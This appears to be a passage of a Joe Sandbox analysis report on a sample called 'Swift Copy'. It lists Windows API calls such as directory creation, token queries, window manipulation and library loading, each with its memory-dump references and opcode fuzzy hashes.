                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                              • String ID:
                                              • API String ID: 2864067406-0
                                              • Opcode ID: 76bb91eddd3fabbeb9dc2353754c2d4a33226ba5847df380d95a6a7189902826
                                              • Instruction ID: 03c7a97d63f550c6923a71ebb0d88c244cae95fcf08f12da5351ba0ad8a7c07b
                                              • Opcode Fuzzy Hash: 76bb91eddd3fabbeb9dc2353754c2d4a33226ba5847df380d95a6a7189902826
                                              • Instruction Fuzzy Hash: 6E21EF35200018EFCB258F95CC98EFB7BB9EB8A310F140155F945672A2C376A9D4DB60
                                              APIs
                                              • GetFileAttributesW.KERNEL32(?,00E0CB68), ref: 00DDD2FB
                                              • GetLastError.KERNEL32 ref: 00DDD30A
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DDD319
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E0CB68), ref: 00DDD376
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: 894534aaa6e79e881a73cd19602949d8e35f5bb8aa5d90afbdc2a79fc9998e57
                                              • Instruction ID: 590bc500b01bd1a98900f1d251fd6cf52c35ef30af54fc43658b83da3c4c281d
                                              • Opcode Fuzzy Hash: 894534aaa6e79e881a73cd19602949d8e35f5bb8aa5d90afbdc2a79fc9998e57
                                              • Instruction Fuzzy Hash: 4F216D705093019FCB10DF68C88186ABBE4EF56764F244A1EF499D73A1E731D94ACBA3
                                              APIs
                                                • Part of subcall function 00DD1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD102A
                                                • Part of subcall function 00DD1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1036
                                                • Part of subcall function 00DD1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1045
                                                • Part of subcall function 00DD1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD104C
                                                • Part of subcall function 00DD1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1062
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DD15BE
                                              • _memcmp.LIBVCRUNTIME ref: 00DD15E1
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD1617
                                              • HeapFree.KERNEL32(00000000), ref: 00DD161E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 1592001646-0
                                              • Opcode ID: 4aea4ebbc8f2a1693e3e45e8c8a61b91a05a4d4b5ce88dfd28996b2f27666d47
                                              • Instruction ID: 0d5c9f02d1e9e61fa7dcc65813032d9e168df4f7b7c313b87bfc07fecc440812
                                              • Opcode Fuzzy Hash: 4aea4ebbc8f2a1693e3e45e8c8a61b91a05a4d4b5ce88dfd28996b2f27666d47
                                              • Instruction Fuzzy Hash: C8218975E00109FFDF00DFA4C949BEEB7B8EF44344F18455AE441AB241E735AA89CBA0
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E0280A
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02824
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02832
                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E02840
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$Long$AttributesLayered
                                              • String ID:
                                              • API String ID: 2169480361-0
                                              • Opcode ID: 8ec4d78519c78d2b753c46b05d4c25e71d05f4621f9d3fca89d120291f39222d
                                              • Instruction ID: 9e32a209dec17ea97ca8e515523cc9ba5d54c402ed122dc355a72fb8799d70b7
                                              • Opcode Fuzzy Hash: 8ec4d78519c78d2b753c46b05d4c25e71d05f4621f9d3fca89d120291f39222d
                                              • Instruction Fuzzy Hash: CC21B235604111AFD7149B24CC48FAA77A5EF45328F24825DF5169B6D2CB71EC82C7A0
                                              APIs
                                                • Part of subcall function 00DD8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DD790A,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?), ref: 00DD8D8C
                                                • Part of subcall function 00DD8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00DD8DB2
                                                • Part of subcall function 00DD8D7D: lstrcmpiW.KERNEL32(00000000,?,00DD790A,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?), ref: 00DD8DE3
                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD7923
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00DD7949
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD7984
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 58191a6cc46e84500cbddbedbc7d472f7666acb735ead1a69d73ca8d465fc40d
                                              • Instruction ID: 498b6f1bd637ff7030ed1b81e004e7ab6759bba3110f8aa7ea8a8c912b89baae
                                              • Opcode Fuzzy Hash: 58191a6cc46e84500cbddbedbc7d472f7666acb735ead1a69d73ca8d465fc40d
                                              • Instruction Fuzzy Hash: 6911AF3A200202AFCB25AF35D855D7A77A9FF85350B50406BF946C73A4EB329851DBB1
                                              APIs
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E07D0B
                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E07D2A
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E07D42
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DEB7AD,00000000), ref: 00E07D6B
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID:
                                              • API String ID: 847901565-0
                                              • Opcode ID: d4f9e71ee74e4cb392420f707a726c915a56751e75338a7c835a035f45141016
                                              • Instruction ID: f8430d5eb6d33d6a9a721755ba1f189ceb72c80c63cd2c5a350ebb4ac3df7b56
                                              • Opcode Fuzzy Hash: d4f9e71ee74e4cb392420f707a726c915a56751e75338a7c835a035f45141016
                                              • Instruction Fuzzy Hash: 23110F31A04614AFCB108F29CC04AA63BA4EF86364B205324F979E72F0E731E9D1CB50
                                              APIs
                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E056BB
                                              • _wcslen.LIBCMT ref: 00E056CD
                                              • _wcslen.LIBCMT ref: 00E056D8
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E05816
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend_wcslen
                                              • String ID:
                                              • API String ID: 455545452-0
                                              • Opcode ID: 055ad85a9485d290a5951a3dce3c958bf3e8ad9eaa640325b6eef163426b00b5
                                              • Instruction ID: 1ec368aeee353fcf52ac71aa23b70d57d443f8df30362a4f501fcdd96b454c0b
                                              • Opcode Fuzzy Hash: 055ad85a9485d290a5951a3dce3c958bf3e8ad9eaa640325b6eef163426b00b5
                                              • Instruction Fuzzy Hash: 1911A276600608A6DF209B61DC85AFF77ACEF11764B50512AF916B60C1EB7089C5CF60
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00DD1A47
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD1A59
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD1A6F
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD1A8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                              • Instruction ID: 602236a5ea570f32eb0683436bc4387e6785d76c0250bb469a958ed1e534f6a0
                                              • Opcode Fuzzy Hash: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                              • Instruction Fuzzy Hash: B2110C3AD01219FFEB11DBA5CD85FADBB78EB04750F200092E604B7290D6716E51DB94
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00DDE1FD
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00DDE230
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DDE246
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DDE24D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2880819207-0
                                              • Opcode ID: 0a423dab36ee21583a315c8b710b3308348a605c4d2be826caeb587e587016fc
                                              • Instruction ID: e45d5d896533d9a74413062958155f4fd38996958ab3a31cbae119267c043edd
                                              • Opcode Fuzzy Hash: 0a423dab36ee21583a315c8b710b3308348a605c4d2be826caeb587e587016fc
                                              • Instruction Fuzzy Hash: 7A110876904214BFCB01AFA99C05A9F7FAC9B45310F14435AF914F7391D271D94887B0
                                              APIs
                                              • CreateThread.KERNEL32(00000000,?,00D9CFF9,00000000,00000004,00000000), ref: 00D9D218
                                              • GetLastError.KERNEL32 ref: 00D9D224
                                              • __dosmaperr.LIBCMT ref: 00D9D22B
                                              • ResumeThread.KERNEL32(00000000), ref: 00D9D249
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                              • String ID:
                                              • API String ID: 173952441-0
                                              • Opcode ID: ba9be968f4552223c4b597321bd7a14fdb2f8de39749f3cc6327c71b2e57b811
                                              • Instruction ID: 4d373d2a84ae845f39bb624bdf378a9cdcc27a7eebf25dfdbd0ae686d5883392
                                              • Opcode Fuzzy Hash: ba9be968f4552223c4b597321bd7a14fdb2f8de39749f3cc6327c71b2e57b811
                                              • Instruction Fuzzy Hash: 7401F536805204BFCF115BA6DC09BAE7A6ADF82730F240319F925E61D0CB71C945C6B0
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D7604C
                                              • GetStockObject.GDI32(00000011), ref: 00D76060
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D7606A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateMessageObjectSendStockWindow
                                              • String ID:
                                              • API String ID: 3970641297-0
                                              • Opcode ID: 9e25b7a4b76eba6e7aa71490b5d8db242a503e17206fbe8752c7574db2175da2
                                              • Instruction ID: 12c7bfdaf1260b0e340bf2caf4732f5da30a04d99a81406faeb56a8fcc793141
                                              • Opcode Fuzzy Hash: 9e25b7a4b76eba6e7aa71490b5d8db242a503e17206fbe8752c7574db2175da2
                                              • Instruction Fuzzy Hash: AC11A172501908BFEF124FA4DC44EEA7B69FF18364F144206FA0852010E732DCA0DFA0
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00D93B56
                                                • Part of subcall function 00D93AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D93AD2
                                                • Part of subcall function 00D93AA3: ___AdjustPointer.LIBCMT ref: 00D93AED
                                              • _UnwindNestedFrames.LIBCMT ref: 00D93B6B
                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D93B7C
                                              • CallCatchBlock.LIBVCRUNTIME ref: 00D93BA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                              • String ID:
                                              • API String ID: 737400349-0
                                              • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                              • Instruction ID: e4232d7f99a2579dc8acb75cf546af5f4a7fe8eaf61191aaeac778c928903f68
                                              • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                              • Instruction Fuzzy Hash: 7A01E932100149BBDF126E95CC46EEB7B6AEF58758F044014FE4896121C732E962EBB0
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D713C6,00000000,00000000,?,00DA301A,00D713C6,00000000,00000000,00000000,?,00DA328B,00000006,FlsSetValue), ref: 00DA30A5
                                              • GetLastError.KERNEL32(?,00DA301A,00D713C6,00000000,00000000,00000000,?,00DA328B,00000006,FlsSetValue,00E12290,FlsSetValue,00000000,00000364,?,00DA2E46), ref: 00DA30B1
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DA301A,00D713C6,00000000,00000000,00000000,?,00DA328B,00000006,FlsSetValue,00E12290,FlsSetValue,00000000), ref: 00DA30BF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: e75becd8141df120a7c5ecfa94290e24851f52df56b0a16064d6e31f5a63fa83
                                              • Instruction ID: b546487f0ca5d528bce5f40b4cb8ab4f8f749741eea6fa93e3d2bfc9cedd7ca3
                                              • Opcode Fuzzy Hash: e75becd8141df120a7c5ecfa94290e24851f52df56b0a16064d6e31f5a63fa83
                                              • Instruction Fuzzy Hash: 8501F732301622AFCB314F7A9C44A577B99AF07BA1B340720F945F3190C722D945C6F4
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00DD747F
                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DD7497
                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DD74AC
                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00DD74CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Type$Register$FileLoadModuleNameUser
                                              • String ID:
                                              • API String ID: 1352324309-0
                                              • Opcode ID: e6702ac207e2d2422681ec5051ac1de67c69a8770464e3364c95ceca61bf9b1a
